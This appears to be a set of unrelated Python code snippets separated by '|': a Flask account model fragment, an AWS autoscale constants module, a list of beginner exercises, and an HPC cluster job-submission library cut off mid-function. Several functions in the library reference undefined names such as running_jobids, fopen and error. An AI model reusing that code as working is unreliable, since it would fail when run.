professor_id = db.Column(db.Integer, db.ForeignKey('professor.id'))
professor = db.relationship('Professor')
student_id = db.Column(db.Integer, db.ForeignKey('student.id'))
student = db.relationship('Student')
university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
university = db.relationship('University')
def __init__(self, username, password, role, company, professor, student, university):
self.username = username
self.password = password
self.role = role
self.company = company
self.professor = professor
self.student = student
self.university = university
def __repr__(self):
return '<Account %r>' % self.username
|
"""
Copyright (c) 2020 Cisco Systems Inc or its affiliates.
All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------
Name: constant.py
Purpose: This is contains all system constants & descriptions
This gets called in all project files if necessary
"""
import os
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# Debug logs
try:
if os.environ['DEBUG_DISABLED'].lower() == 'true':
DEBUG_DISABLED = True
else:
DEBUG_DISABLED = False
if DEBUG_DISABLED:
logging.disable(logging.DEBUG) # If DebugLogEnabled is False, logging.disable(logging.DEBUG) is run
except Exception as e:
logger.error("Env variable 'DEBUG_DISABLED' may not available")
logger.debug(str(e))
exit(0)
# Get Autoscale Group Name
try:
ASG_NAME = os.environ['ASG_NAME']
except Exception as e:
logger.error("Env variable 'ASG_NAME' isn't available")
logger.debug(str(e))
exit(0)
# Get Function Name
try:
FUNC_NAME = os.environ['FUNC_NAME']
except Exception as e:
logger.error("Env variable 'FUNC_NAME' isn't available")
logger.debug(str(e))
exit(0)
else:
# Collect Environment variables for FUNC_NAME == 'CreateENI'
if FUNC_NAME == 'CreateENI':
DIAG_ENI_NAME = "-diag-eni"
INSIDE_ENI_NAME = "-inside-eni"
OUTSIDE_ENI_NAME = "-outside-eni"
INSIDE_SUBNET_ID_LIST = []
OUTSIDE_SUBNET_ID_LIST = []
try:
NO_OF_AZs = os.environ['NO_OF_AZs']
logger.info("Number of availability zones: " + str(NO_OF_AZs))
pass
except Exception as e:
logger.error("Env variable 'NO_OF_AZs' isn't available")
logger.debug(str(e))
exit(0)
else:
if int(NO_OF_AZs) == 1:
try:
INSIDE_SUBNET_ID0 = os.environ['INSIDE_SUBNET0']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID0 = os.environ['OUTSIDE_SUBNET0']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
logger.info("List of subnet came from User Input: ")
logger.info(INSIDE_SUBNET_ID_LIST)
logger.info(OUTSIDE_SUBNET_ID_LIST)
elif int(NO_OF_AZs) == 2:
try:
INSIDE_SUBNET_ID0 = os.environ['INSIDE_SUBNET0']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID0 = os.environ['OUTSIDE_SUBNET0']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
try:
INSIDE_SUBNET_ID1 = os.environ['INSIDE_SUBNET1']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID1)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET1' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID1 = os.environ['OUTSIDE_SUBNET1']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID1)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET1' isn't available")
logger.debug(str(e))
exit(0)
logger.info("List of subnet came from User Input: ")
logger.info(INSIDE_SUBNET_ID_LIST)
logger.info(OUTSIDE_SUBNET_ID_LIST)
elif int(NO_OF_AZs) == 3:
try:
INSIDE_SUBNET_ID0 = os.environ['INSIDE_SUBNET0']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID0 = os.environ['OUTSIDE_SUBNET0']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID0)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET0' isn't available")
logger.debug(str(e))
exit(0)
try:
INSIDE_SUBNET_ID1 = os.environ['INSIDE_SUBNET1']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID1)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET1' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID1 = os.environ['OUTSIDE_SUBNET1']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID1)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET1' isn't available")
logger.debug(str(e))
exit(0)
try:
INSIDE_SUBNET_ID2 = os.environ['INSIDE_SUBNET2']
INSIDE_SUBNET_ID_LIST.append(INSIDE_SUBNET_ID2)
except Exception as e:
logger.error("Env variable 'INSIDE_SUBNET2' isn't available")
logger.debug(str(e))
exit(0)
try:
OUTSIDE_SUBNET_ID2 = os.environ['OUTSIDE_SUBNET2']
OUTSIDE_SUBNET_ID_LIST.append(OUTSIDE_SUBNET_ID2)
except Exception as e:
logger.error("Env variable 'OUTSIDE_SUBNET2' isn't available")
logger.debug(str(e))
exit(0)
logger.info("List of subnet came from User Input: ")
logger.info(INSIDE_SUBNET_ID_LIST)
logger.info(OUTSIDE_SUBNET_ID_LIST)
else:
logger.error("Un-supported number of Availability zones")
exit(0)
# Collect Environment variables for FUNC_NAME == 'CreateENI' or FUNC_NAME == 'DeregTarget'
if FUNC_NAME == 'CreateENI' or FUNC_NAME == 'DeregTarget':
# Get Load Balancer ARN
try:
LB_ARN_OUTSIDE = os.environ['LB_ARN_OUTSIDE']
except Exception as e:
logger.error("Env variable 'LB_ARN_OUTSIDE' isn't available")
logger.debug(str(e))
exit(0)
# User Input De-registration delay - 10 seconds
try:
DEREGISTRATION_DELAY = int(os.environ['LB_DEREGISTRATION_DELAY']) - 10
except Exception as e:
logger.error("Env variable 'LB_DEREGISTRATION_DELAY' isn't available")
logger.debug(str(e))
exit(0)
|
"""
1. Write a Python function that takes a sequence of numbers and determines whether all the numbers are different from each other.
2. Write a Python program to create all possible strings by using 'a', 'e', 'i', 'o', 'u'. Use the characters exactly once.
3. Write a Python program to remove and print every third number from a list of numbers until the list becomes empty.
4. Write a Python program to find unique triplets whose three elements gives the sum of zero from an array of n integers.
5. Write a Python program to create the combinations of 3 digit combo.
6. Write a Python program to print a long text, convert the string to a list and print all the words and their frequencies.
7. Write a Python program to count the number of each character of a given text of a text file.
8. Write a Python program to get the top stories from Google news.
9. Write a Python program to get a list of locally installed Python modules.
10. Write a Python program to display some information about the OS where the script is running.
"""
|
import os
import sys
import random
import time
import pickle
import subprocess
import math
import pdb
import inspect
import types
import imp
import re
from string import Template
### define globals
rproc_nqstat_time = None
rproc_nqstat_output = None
MATLAB_RETURN_VALUE = None
THIS_IS_A_RPROC_PROCESS = None
rproc_wait_jobinfo = None
SCHEDULER = 'lsf'
SCHED_KILL_JOB = None
SCHED_GET_JOB_RUNTIME = None
SCHED_JOB_ID_SPLIT = None
SCHED_GET_JOB_NUMBER = None
SCHED_SUBMIT_CMD = None
SCHED_MIN_OPTIONS = None
#### define jobinfo class
class Jobinfo():
def __init__(self):
self.ProcName = []
self.P1 = []
self.Mem = []
self.options = dict()
self.time = None
self.prefix = []
self.mat_fname = ''
self.data_fname = ''
self.result_fname = ''
self.m_fname = ''
self.log_fname = ''
self.qsublog_fname = ''
self.jobid = -1
self.submission_time = None
self.retries = 0
self.created = 0
self.time_of_loss = None
self.crashed_time = None
self.maxvmem = None
self.resubmit = False
self.time_req_resubmit = []
self.mem_req_resubmit = []
self.data_size = []
self.start_time = []
self.hard_time_limit = 1000000
self.callfile = None
### define Error class
class RprocRerun(Exception):
def __init__(self, string):
self.string = string
def __str__(self):
return repr(self.string)
def _set_scheduler():
global SCHEDULER, SCHED_KILL_JOB, SCHED_GET_JOB_RUNTIME
global SCHED_JOB_ID_SPLIT, SCHED_GET_JOB_NUMBER, SCHED_SUBMIT_CMD
global SCHED_MIN_OPTIONS
if SCHEDULER == 'lsf':
SCHED_KILL_JOB = 'bkill'
SCHED_GET_JOB_RUNTIME = Template('bjobs -o run_time ${jobid} | tail -n +2 | sed -e "s/ .*//g" ')
SCHED_JOB_ID_SPLIT = Template('${var}.split(\'<\')[1].split(\'>\')')
SCHED_GET_JOB_NUMBER = Template('bjobs -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | bsub -o ${qsub_log} -e ${qsub_log} ${options} -J ${name} >> ${log} 2>&1')
SCHED_MIN_OPTIONS = Template('-n ${cores} -M ${mem} -R "rusage[mem=${coremem}]" -W ${time}')
elif SCHEDULER == 'torque':
SCHED_KILL_JOB = 'qdel'
SCHED_GET_JOB_RUNTIME = Template('qstat -f ${jobid} | grep resources_used.walltime | sed -e "s/.*= //g"')
SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j oe -r y ${options} -N ${name} >> ${log} 2>&1')
SCHED_MIN_OPTIONS = Template('-l nodes=1:ppn=${cores} -l mem=${mem}mb,vmem=${mem}mb,pmem=${mem}mb -l walltime=${time}')
elif SCHEDULER == 'slurm':
SCHED_KILL_JOB = 'qdel'
SCHED_GET_JOB_RUNTIME = None #TODO
SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j y -r y ${options} -N ${name} >> ${log} 2>&1') # TODO check this
SCHED_MIN_OPTIONS = Template(' -l h_vmem=${mem}M -l s_vmem=${mem}M -l h_cpu=${time}') # TODO check this
elif SCHEDULER == 'sge':
SCHED_KILL_JOB = 'qdel'
SCHED_GET_JOB_RUNTIME = None #TODO
SCHED_JOB_ID_SPLIT = Template('${var}.split(\'.\')')
SCHED_GET_JOB_NUMBER = Template('qstat -u ${user} 2> /dev/null | grep ${user} | wc -l | tr -d " "')
SCHED_SUBMIT_CMD = Template('echo \'${env} hostname; bash ${script} >> ${log}\' | qsub -o ${qsub_log} -j y -r y ${options} -N ${name} >> ${log} 2>&1')
SCHED_MIN_OPTIONS = Template(' -l h_vmem=${mem}M -l s_vmem=${mem}M -soft -l h_cpu=${time} -hard ')
def rproc(ProcName, P1, Mem=None, options=None, runtime=None, callfile=None, resubmission=False):
# [jobinfo]=rproc(ProcName, P1, Mem, options, time)
#
# time in minutes
# mem in mb
global SCHED_JOB_ID_SPLIT, SCHED_GET_JOB_NUMBER, SCHED_SUBMIT_CMD
global SCHED_MIN_OPTIONS
_set_scheduler()
if callfile is None:
### check if ProcName is defined in calling function
callframe = sys._getframe(1)
if not ProcName in callframe.f_locals:
if not ProcName in callframe.f_globals:
print('ERROR: Could find no definition for %s in local or global context of calling function. Use kword callfile to specify file where %s is defined. Use the relative path to the location of the calling function!' % (ProcName, ProcName), file=sys.stderr)
return
else:
callfile = (callframe.f_globals[ProcName].__module__, inspect.getfile(callframe.f_globals[ProcName]))
else:
callfile = (callframe.f_locals[ProcName].__module__, inspect.getfile(callframe.f_locals[ProcName]))
### detect path of this script
this_frame = sys._getframe(0)
#rproc_path = os.path.abspath(inspect.getfile(this_frame))
if runtime is None:
runtime = 24
if Mem is None:
Mem = 300
if Mem < 100:
print('WARNING: You specified to allocate less than 100Mb memory for your job. This might not be enough to start. Re-setting to 100Mb', file=sys.stderr)
Mem = 100
if options is None:
options = dict()
### get module list of caller to re-create environment
if not 'imports' in options:
options['imports'] = dict()
if not resubmission:
callframe = sys._getframe(1)
#options['package'] = os.path.dirname(os.path.abspath(callframe.f_globals['__file__']))
for l in callframe.f_globals:
if (len(l) < 2 or l[:2] != '__'):
if isinstance(callframe.f_globals[l], types.ModuleType):
if not l in options['imports']:
if imp.is_builtin(callframe.f_globals[l].__name__) != 0:
options['imports'][l] = (callframe.f_globals[l].__name__, 'builtin')
else:
options['imports'][l] = (callframe.f_globals[l].__name__, callframe.f_globals[l].__file__)
if not callfile[0] in options['imports']:
options['imports'][callfile[0]] = callfile
home_str = os.environ['HOME']
use_reservation = False
### TODO this is only relevant for SGE
if 'ncpus' in options and options['ncpus'] > 1:
use_reservation = 1 ;
if not 'verbosity' in options:
options['verbosity'] = True
if not 'maxjobs' in options:
options['maxjobs'] = 400 #5000
if not 'waitonfull' in options:
options['waitonfull'] = True
if not 'immediately' in options:
options['immediately'] = False
if not 'immediately_bg' in options:
options['immediately_bg'] = False
if not 'submit_now' in options:
options['submit_now'] = True
if not 'nicetohave' in options:
options['nicetohave'] = False
if not 'ncpus' in options:
options['ncpus'] = 1
if not 'start_dir' in options:
dirctry = os.getcwd()
else:
dirctry = options['start_dir']
if not 'log_dir' in options:
log_dir = os.path.join(dirctry, 'tmp_spl_parallel')
else:
log_dir = options['log_dir']
if not 'resubmit' in options:
options['resubmit'] = False
options['time_req_resubmit'] = []
options['mem_req_resubmit'] = []
if not 'data_size' in options:
options['data_size'] = []
if not 'hard_time_limit' in options:
options['hard_time_limit'] = 1000000
env_str = ''
if 'environment' in options:
env_str = 'source activate %s; ' % options['environment']
jobinfo = rproc_empty()
jobinfo.ProcName = ProcName
jobinfo.P1 = P1
jobinfo.Mem = Mem
jobinfo.options = options
jobinfo.time = runtime
jobinfo.created = True
jobinfo.resubmit = options['resubmit']
jobinfo.mem_req_resubmit = options['mem_req_resubmit']
jobinfo.time_req_resubmit = options['time_req_resubmit']
jobinfo.data_size = options['data_size']
jobinfo.hard_time_limit = options['hard_time_limit']
if not os.path.exists(log_dir):
os.makedirs(log_dir)
assert os.path.exists(log_dir)
### assembly option string
if use_reservation:
option_str = ' -R y'
else:
option_str = ''
option_str += SCHED_MIN_OPTIONS.substitute(cores=str(options['ncpus']), mem=str(Mem), coremem=str(math.ceil(Mem / float(options['ncpus']))), time=str(max(60, runtime)))
if 'hold' in options:
if options['hold']:
option_str += ' -h u'
if 'queue' in options:
option_str += ' -q "%s" ' % options['queue']
if 'nicetohave' in options and options['nicetohave']:
option_str += ' -l nicetohave=1'
if 'priority' in options:
option_str += ' -p %i' % options['priority']
if 'express' in options and options['express']:
option_str += ' -l express'
if 'hostname' in options:
option_str += '%s -l hostname=%s' % (option_str, options['hostname'])
### TODO make this configurable
# use same pthon that the one it was called with
#bin_str = sys.executable
bin_str = 'spladder pyproc'
### request cplex license
if 'cplex' in options and options['cplex']:
option_str += ' -l cplex=1'
### request several cpus
#if 'ncpus' in options and options['ncpus'] > 1:
# option_str += ' -pe "*" %i ' % options['ncpus']
if 'identifier' in options:
identifier = options['identifier']
else:
identifier = 'RP' ;
cc = random.randint(0, 100000)
prefix = '%s%i-%1.10f' % (identifier, cc, time.time())
mat_fname = os.path.join(log_dir, '%s.pickle' % prefix)
data_fname = os.path.join(log_dir, '%s_data.pickle' % prefix)
result_fname = os.path.join(log_dir, '%s_result.pickle' % prefix)
m_fname = os.path.join(log_dir, '%s.sh' % prefix)
while os.path.exists(mat_fname) or os.path.exists(result_fname) or os.path.exists(m_fname):
cc = random.randint(0, 100000)
prefix = '%s%i-%1.10f' % (identifier, cc, time.time())
mat_fname = os.path.join(log_dir, '%s.pickle' % prefix)
data_fname = os.path.join(log_dir, '%s_data.pickle' % prefix)
result_fname = os.path.join(log_dir, '%s_result.pickle' % prefix)
m_fname = os.path.join(log_dir, '%s.sh' % prefix)
if 'log_fname' in options:
log_fname = options['log_fname']
else:
log_fname = os.path.join(log_dir, '%s_%s.rproc' % (prefix, time.strftime('%d-%b-%Y_%H_%M')))
qsublog_fname = '%s.qsubout' % log_fname
jobinfo.prefix = prefix
jobinfo.mat_fname = mat_fname
jobinfo.data_fname = data_fname
jobinfo.result_fname = result_fname
jobinfo.m_fname = m_fname
jobinfo.log_fname = log_fname
jobinfo.qsublog_fname = qsublog_fname
jobinfo.callfile = callfile
### save the call information
pickle.dump((ProcName, dirctry, options, callfile), open(mat_fname, 'wb'), -1)
pickle.dump(P1, open(data_fname, 'wb'), -1)
#evalstring = '%s %s %s %s' % (bin_str, rproc_path, mat_fname, data_fname)
evalstring = '%s %s %s' % (bin_str, mat_fname, data_fname)
evalstring = 'cd %s;%s %s; exit' % (dirctry, env_str, evalstring)
fd = open(m_fname, 'w')
print('%s' % evalstring, file=fd)
fd.close()
if 'envstr' in options:
envstr = options['envstr']
if len(envstr) > 0:
envstr += ';'
else:
envstr = ''
if options['immediately']:
callstr = '%s bash %s >> %s' % (envstr, m_fname, log_fname)
elif options['immediately_bg']:
callstr = '%s bash %s >> %s &' % (envstr, m_fname, log_fname)
else:
callstr = SCHED_SUBMIT_CMD.substitute(env=envstr, script=m_fname, log=log_fname, qsub_log=qsublog_fname, options=option_str, name=prefix)
### too verbose
#if options['submit_now'] and options['verbosity']:
# print callstr
# wait until we are allowed to submit again, i.e. #jobs < maxjobs
if not options['immediately'] and not options['immediately_bg'] and options['waitonfull']:
while True:
try:
#num_queued = int(subprocess.check_output('qstat -u' + os.environ['USER'] + '2> /dev/null | grep ' + os.environ['USER'] + '| wc -l | tr -d " "', shell=True).strip())
#num_queued = int(subprocess.check_output('bjobs -u' + os.environ['USER'] + '2> /dev/null | grep ' + os.environ['USER'] + '| wc -l | tr -d " "', shell=True).strip())
num_queued = int(subprocess.check_output(SCHED_GET_JOB_NUMBER.substitute(user=os.environ['USER']), shell=True).decode('utf-8').strip())
except:
print('WARNING: could not determine how many jobs are scheduled', file=sys.stderr)
break
# keep 50 spare jobs if multiple rprocs are scheduling...
if (num_queued < options['maxjobs']):
break
else:
if options['verbosity']:
print('queue full, sleeping 60 seconds (%i/%i)' %(num_queued, options['maxjobs']), file=sys.stdout)
time.sleep(60)
if options['submit_now']:
if options['immediately'] and options['verbosity']:
print('immediatedly starting job on local machine', file=sys.stdout)
if options['immediately_bg'] and options['verbosity']:
print('immediatedly starting job on local machine in background', file=sys.stdout)
if options['immediately_bg']:
while True:
str_ = subprocess.check_output('uptime').decode('utf-8').strip()
float(str_[re.search('average:', str_).start()+8:].split(',')[0])
hit = re.search('average:', str_)
while hit is None:
hit = re.search('average:', str_)
idx = hit.start()
cpu_load = float(str_[idx+8:].split(',')[0])
if cpu_load > 13:
if options['verbosity']:
print('load too high: %1.2f' % cpu_load)
time.sleep(10)
else:
break
time.sleep(2)
p1 = subprocess.Popen(['echo', callstr], stdout=subprocess.PIPE)
p2 = subprocess.Popen(['bash'], stdin=p1.stdout, stdout=subprocess.PIPE)
p2.communicate()
ret = p2.returncode
if ret != 0:
print('submission failed:\n\tsubmission string: %s\n\treturn code: %i' % (callstr, ret), file=sys.stderr)
jobinfo.submission_time = time.time()
p1.communicate()
### grab job ID from submission log file
if not options['immediately'] and not options['immediately_bg']:
fd = open(log_fname, 'r')
jobinfo.jobid = -1
if fd:
s = fd.read().strip()
items = eval(SCHED_JOB_ID_SPLIT.substitute(var='s'))
try:
jobinfo.jobid = int(items[0])
except:
print(callstr, file=sys.stderr)
print('ERROR: submission failed: %s' % s, file=sys.stderr)
sys.exit(1)
fd.close()
rproc_register('submit', jobinfo)
else:
print('%s does not exist' % log_fname, file=sys.stderr)
else:
jobinfo.jobid = 0
else:
jobinfo.jobid = 0
return jobinfo
def finish():
print('rproc finishing')
global MATLAB_RETURN_VALUE
if MATLAB_RETURN_VALUE is not None:
print('exit code %i' % MATLAB_RETURN_VALUE)
try:
rf = os.environ['MATLAB_RETURN_FILE']
fd = fopen(rf, 'w+')
if fd:
print('%i', MATLAB_RETURN_VALUE[0], file=fd)
fclose(fd) ;
except KeyError:
print('WARNING: environment MATLAB_RETURN_FILE not defined', file=sys.stderr)
def rproc_clean_register():
fname = os.path.join(os.environ['HOME'], 'tmp', 'rproc.log')
jobids = []
parent_jobids = []
fd = open(fname, 'r')
for line in fd:
if len(line.strip()) == 0:
continue
items = line.split()
if len(items) < 4:
continue
if len(items[0]) == 0:
continue
if len(items[3]) == 0:
continue
if items[0][0] >= '0' and items[0][0] <= '9' and ((items[3][0] >= '0' and items[3][0] <= '9') or items[3][0] == '-'):
jobids.append(int(items[0]))
parent_jobids.append(int(items[3]))
text = subprocess.check_output('qstat').decode('utf-8').strip()
for line in text.split('\n'):
items = line.split(' ')
if items[0][0] >= '0' and items[0][0] <= '9':
running_jobids.append(int(items[0]))
idx = [i for i in range(len(jobids)) if jobids[i] in running_jobids]
for i in range(len(idx)):
if not parent_jobids[idx[i]] in running_jobids and parent_jobids[idx[i]] != -1:
print('job %i is still running, but the parent job %i not' % (jobids[idx[i]], parent_jobids[idx[i]]), file=sys.stderr)
def rproc_cleanup(jobinfo):
for ix in range(len(jobinfo)):
command = 'rm -f %s %s %s %s %s %s' % (jobinfo[ix].mat_fname, jobinfo[ix].result_fname,
jobinfo[ix].m_fname, jobinfo[ix].log_fname,
jobinfo[ix].qsublog_fname, jobinfo[ix].data_fname)
subprocess.call(command.split(' '))
rproc_register('cleanup', jobinfo[ix])
def rproc_cmd(unix_cmd, jobinfo):
for i in range(len(jobinfo)):
if len(jobinfo[i].jobid) > 0 and jobinfo[i].jobid != -1:
subprocess.call([unix_cmd, jobinfo[i].jobid])
def rproc_create(ProcName, P1, Mem=100, options=[], runtime=144000):
# [jobinfo]=rproc(ProcName, P1, Mem, options, time)
#
# time in minutes
# mem in mb
jobinfo = rproc_empty()
jobinfo.ProcName = ProcName
jobinfo.P1 = P1
jobinfo.Mem = Mem
jobinfo.options = options
jobinfo.time = runtime
jobinfo.created = True
jobinfo.retries = -1
return jobinfo
def rproc_empty(N=None):
"""Create jobinfo list"""
if N is None:
N = 1
if N > 1:
jobinfo = []
for i in range(N):
jobinfo.append(Jobinfo())
else:
jobinfo = Jobinfo()
return jobinfo
def rproc_finished(jobinfo):
# isfinished = rproc_finished(jobinfo) ;
if jobinfo.jobid == -1:
return False
if os.path.exists(jobinfo.result_fname):
rproc_register('finished', jobinfo)
return True
return False
def rproc_kill(jobinfo):
global SCHED_KILL_JOB
if jobinfo == 'wait':
global rproc_wait_jobinfo
jobinfo = rproc_wait_jobinfo
for i in range(len(jobinfo)):
if len(jobinfo[i].jobid) and jobinfo[i].jobid > 0:
subprocess.call(SCHED_KILL_JOB, jobinfo[i].jobid, '2>', '/dev/null')
rproc_register('kill', jobinfo[i])
def rproc_reached_timelimit(jobinfo):
# [result, jobwalltime] = rproc_reached_timelimit(jobinfo)
global SCHED_GET_JOB_RUNTIME
#str_ = 'qacct -j %i | grep ru_wallclock|sed \'s/ru_wallclock//g\'' % jobinfo.jobid
#str_ = 'qstat -f %i | grep resources_used.walltime | sed -e "s/.*= //g"' % jobinfo.jobid
#str_ = 'bjobs -o run_time %i | tail -n +2 | sed -e "s/ .*//g"' % (jobinfo.jobid)
str_ = SCHED_GET_JOB_RUNTIME.substitute(jobid=jobinfo.jobid)
w = subprocess.check_output(str_, shell=True).decode('utf-8')
## TODO use save Popen for pipeline
if 'error' in w:
return (False, -1)
try:
jobwalltime = split_walltime(w.strip()) # get time in seconds
except Exception:
return (False, -1)
if not (jobwalltime > 0 and jobwalltime < 36000000): # sanity checks
print('WARNING: invalid output from qacct', file=sys.stderr)
return (False, -1)
if jobwalltime > (jobinfo.time * 60):
return (True, jobwalltime)
else:
return (False, jobwalltime)
def rproc_register(action, jobinfo):
try:
this_jobid = int(os.environ['JOB_ID'])
except:
this_jobid = -1
rproc_log_fname = os.path.join(os.environ['HOME'], 'tmp', 'pyproc.log')
if not os.path.exists(rproc_log_fname):
fd = open(rproc_log_fname, 'a+')
print('# prefix\taction\tparent jobid\tjobid\tfunction\ttime', file=fd)
fd.close()
fd = open(rproc_log_fname, 'a+')
print('%i\t%s\t%s\t%i\t%s\t%s' % (jobinfo.jobid, jobinfo.prefix, action, this_jobid, jobinfo.ProcName, time.asctime()), file=fd) #time.strftime('%a_%b_%d_%Y_%H:%M:%S'))
fd.close()
def rproc_rerun(mess=''):
global MATLAB_RETURN_VALUE
MATLAB_RETURN_VALUE=99
global THIS_IS_A_RPROC_PROCESS
if THIS_IS_A_RPROC_PROCESS is not None and THIS_IS_A_RPROC_PROCESS == 1:
sys.exit
else:
raise RprocRerun(mess)
def rproc_resubmit(jobinfo, force=True):
# jobinfo2 = rproc_resubmit(jobinfo);
if jobinfo is None:
return jobinfo
elif isinstance(jobinfo, list):
jobinfo2 = jobinfo
for i in range(len(jobinfo)):
jobinfo2[i] = rproc_resubmit(jobinfo[i])
return jobinfo2
if (jobinfo.retries >= 0) and (rproc_time_since_submission(jobinfo) < 1):
#warning('job was submitted less than a minute ago. not resubmitted.') ;
return jobinfo
if jobinfo.retries >= 3:
if jobinfo.options['verbosity'] >= 0:
print('Warning: job has already been submitted %i times' % jobinfo.retries, file=sys.stderr)
if jobinfo.options['verbosity'] > 0:
print('check file %s' % jobinfo.log_fname)
return jobinfo
if (jobinfo.retries >= 0):
(still_running, qstat_line, start_time, status) = rproc_still_running(jobinfo)
if still_running:
if jobinfo.options['verbosity'] > 0:
print('.', end=' ', file=sys.stdout)
jobinfo2 = jobinfo
jobinfo2.time_of_loss = None
return jobinfo2
if jobinfo.time_of_loss is None:
jobinfo.time_of_loss = time.time()
# more than a minute lost?
if not force and ((jobinfo.time_of_loss - time.time() / 60) < 1):
#warning('do not resubmit yet ... ') ;
jobinfo2 = jobinfo
return jobinfo2
#rproc_cleanup(jobinfo)
#fprintf('\nresubmitting job\n') ;
jobinfo2 = rproc(jobinfo.ProcName, jobinfo.P1, jobinfo.Mem, jobinfo.options, jobinfo.time, jobinfo.callfile, resubmission=True)
if jobinfo.jobid != -1:
# increase only, if it has not been resubmitted before
jobinfo2.retries = jobinfo.retries + 1
return jobinfo2
def rproc_result(jobinfo, read_attempts=None):
# [retval1, retval2] = rproc_result(jobinfo, [read_attempts])
if not os.path.exists(jobinfo.result_fname):
att = 1
while not os.path.exists(jobinfo.result_fname):
print('Job not finished yet. Waiting for result file to appear.', file=sys.stdout)
if read_attempts is not None and att > read_attempts:
error('Unable to load result from %s', jobinfo.result_fname);
time.sleep(10)
att += 1
(retval1, retval2) = pickle.load(open(jobinfo.result_fname, 'rb'))
return (retval1, retval2)
def rproc_still_running(jobinfo):
# [still_running, line, start_time, status] = rproc_still_running(jobinfo);
global SCHEDULER
# SCHED_JOB_STATUS
if SCHEDULER == 'torque':
qstat_command = ['qstat', '-u', os.environ['USER']]
elif SCHEDULER == 'sge':
qstat_command = ['qstat', '-u', os.environ['USER']]
elif SCHEDULER == 'lsf':
qstat_command = ['bjobs', '-u', os.environ['USER']]
elif SCHEDULER == 'slurm':
qstat_command = ['qstat', '-u', os.environ['USER']]
status = 0
still_running = 0
global rproc_nqstat_output
global rproc_nqstat_time
start_time = []
if jobinfo.jobid == 0:
# runs locally in background
still_running = not rproc_finished(jobinfo)
line = 'local job %s is still running: %s\n' % (jobinfo.prefix, jobinfo.log_fname)
return (still_running, line, start_time, status)
curtime = time.time()
if rproc_nqstat_time is None or (curtime - rproc_nqstat_time > 0.5e-4):
try:
text = subprocess.check_output(qstat_command).decode('utf-8')
rproc_nqstat_output = text
rproc_nqstat_time = curtime
except subprocess.CalledProcessError as e:
if e.returncode == 130:
print('rproc_still_running interupted by user', file=sys.stderr)
status = -1
line = ''
start_time = ''
print('WARNING: qstat failed', file=sys.stderr)
text = ''
else:
text = rproc_nqstat_output
for line in text.strip().split('\n'):
if len(line) > 0:
items = re.sub(r' +', ' ', line).split(' ')
if not os.environ['USER'] in items:
continue
for j in range(len(items)): #assume that first non-empty item is the jobid
if len(items[j]) > 0:
p = int(items[j].split('.')[0].strip('[]'))
if p == jobinfo.jobid:
still_running = 1
status = get_status(items)
still_running = check_status(status)
if len(jobinfo.start_time) == 0 and status == 'r':
start_time = time.time()
else:
start_time = jobinfo.start_time
return (still_running, line, start_time, status)
break
line = []
return (still_running, line, start_time, status)
def get_status(items):
# status = get_status(items)
global SCHEDULER
#SCHED_STATUS_IDX
if SCHEDULER == 'torque':
status_idx = 10
elif SCHEDULER == 'sge':
status_idx = None
elif SCHEDULER == 'lsf':
status_idx = 2
elif SCHEDULER == 'slurm':
status_idx = 5
status = ''
num = 0
for j in range(len(items)):
if len(items[j]) > 0:
num += 1
if num == 10:
status = items[j]
break
return status
def check_status(status):
# ret = check_status(status)
global SCHEDULER
#SCHED_STATUS_LIST
if SCHEDULER == 'torque':
status_list = ['E', 'C', 'S']
elif SCHEDULER == 'sge':
status_list = ['d', 'E', 't', 's', 'S']
elif SCHEDULER == 'lsf':
status_list = ['USUSP', 'SSUSP', 'DONE', 'EXIT', 'ZOMBI']
elif SCHEDULER == 'slurm':
